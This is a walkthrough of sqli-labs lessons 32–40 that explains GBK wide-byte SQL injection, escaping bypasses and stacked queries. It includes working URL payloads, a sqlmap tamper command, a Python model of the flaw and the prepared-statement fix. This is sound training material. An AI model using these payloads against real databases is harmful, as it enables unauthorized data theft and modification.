32
Steps
Manual
How wide-byte injection works: the page encoding in PHP is GBK, but the escaping function only prepends a single ASCII byte (the backslash, 0x5c). When MySQL also uses GBK, %df and that \ are read together as %df%5c, one two-byte (wide) character, so the quote that follows is no longer escaped.
payload:?id=0%df%27%20union%20select%201,2,3--+
sqlmap
python sqlmap.py -r temp.txt --tamper unmagicquotes.py --batch --dbms mysql
33
Same as 32. Looking at the source, 32 uses a hand-written addslash function, while 33 uses PHP's built-in addslashes().
34
Steps
Manual
Just switch the request to POST.
payload:uname=admin%df' union select version(),database()--+&passwd=admin&submit=Submit
35
Steps
Manual
payload:?id=-1%20union%20select%201,2,3
36
Same as 32.
Filter function:
    function check_quotes($string)
    {
        $string = mysql_real_escape_string($string);
        return $string;
    }
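As an added example (not code from the sqli-labs source or this write-up), the following Python models PHP's addslashes() at the byte level and checks whether the escaping is still intact once MySQL decodes the query with the connection charset. It covers both the 32/33 case (addslashes) and the 36 case (mysql_real_escape_string() without the client charset set behaves the same way); the sample input bytes are constructed.

```python
# Added example, not from the original write-up: byte-level model of PHP's
# addslashes() plus a check that the backslash still protects each quote after
# the bytes are decoded with the MySQL connection charset.

ESCAPED_BYTES = {0x27, 0x22, 0x5C, 0x00}   # ' " \ NUL: what addslashes() prefixes


def addslashes_bytes(data: bytes) -> bytes:
    """Imitate PHP addslashes(): insert one ASCII backslash (0x5c) before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in ESCAPED_BYTES:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quotes_still_escaped(escaped: bytes, charset: str) -> bool:
    """Decode the bytes the way the server would and confirm every ' is preceded by \\.

    Returns False when the charset merges the backslash into a multi-byte
    character, which leaves the quote live inside the SQL string.
    """
    text = escaped.decode(charset, errors="replace")
    return all(i > 0 and text[i - 1] == "\\"
               for i, ch in enumerate(text) if ch == "'")


# Constructed sample: the bytes that arrive for ?id=0%df%27
SAMPLE = b"0\xdf'"


def check_sample(charset: str) -> bool:
    """True if escaping SAMPLE survives decoding under the given charset."""
    return quotes_still_escaped(addslashes_bytes(SAMPLE), charset)


if __name__ == "__main__":
    esc = addslashes_bytes(SAMPLE)
    print(esc)                        # b"0\xdf\\'"
    print(check_sample("latin-1"))    # True: 0xdf is a single byte, the quote stays escaped
    print(check_sample("gbk"))        # False: 0xdf 0x5c decode to one character (運)
    print(esc.decode("gbk", errors="replace"))   # "0運'" - the quote now closes the string
```

The fix on the PHP side is to make the escaper charset-aware, i.e. call mysqli_set_charset() with the connection's charset before mysqli_real_escape_string(), or better, use prepared statements so the value never touches the SQL text.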
37
36 changed to POST.
38
Steps
Manual
    /* Excerpt from the 38 source: $con1 is the mysqli connection, $sql the query built from the request */
    if (mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if ($result = mysqli_store_result($con1))
        {
            if ($row = mysqli_fetch_row($result))
            {
                echo '<font size = "5" color= "#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);
                echo "<br>";
                echo "</font>";
            }
            // mysqli_free_result($result);
        }
        /* print divider */
        if (mysqli_more_results($con1))
        {
            //printf("-----------------\n");
        }
        /* the remaining result sets are never consumed, but the stacked statements have already run */
        //while (mysqli_next_result($con1));
    }
    else
    {
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
    /* close connection */
    mysqli_close($con1);
mysqli_multi_query() executes one or more queries against the database; multiple queries are separated by semicolons, which is what makes stacked injection possible here.
payload:?id=1%27;%20create%20table%20test38%20like%20users;%20--+
39
Same as above, but numeric injection.
40
payload:http://localhost/Less-40/?id=1%27);create%20table%20test40%20like%20users;--+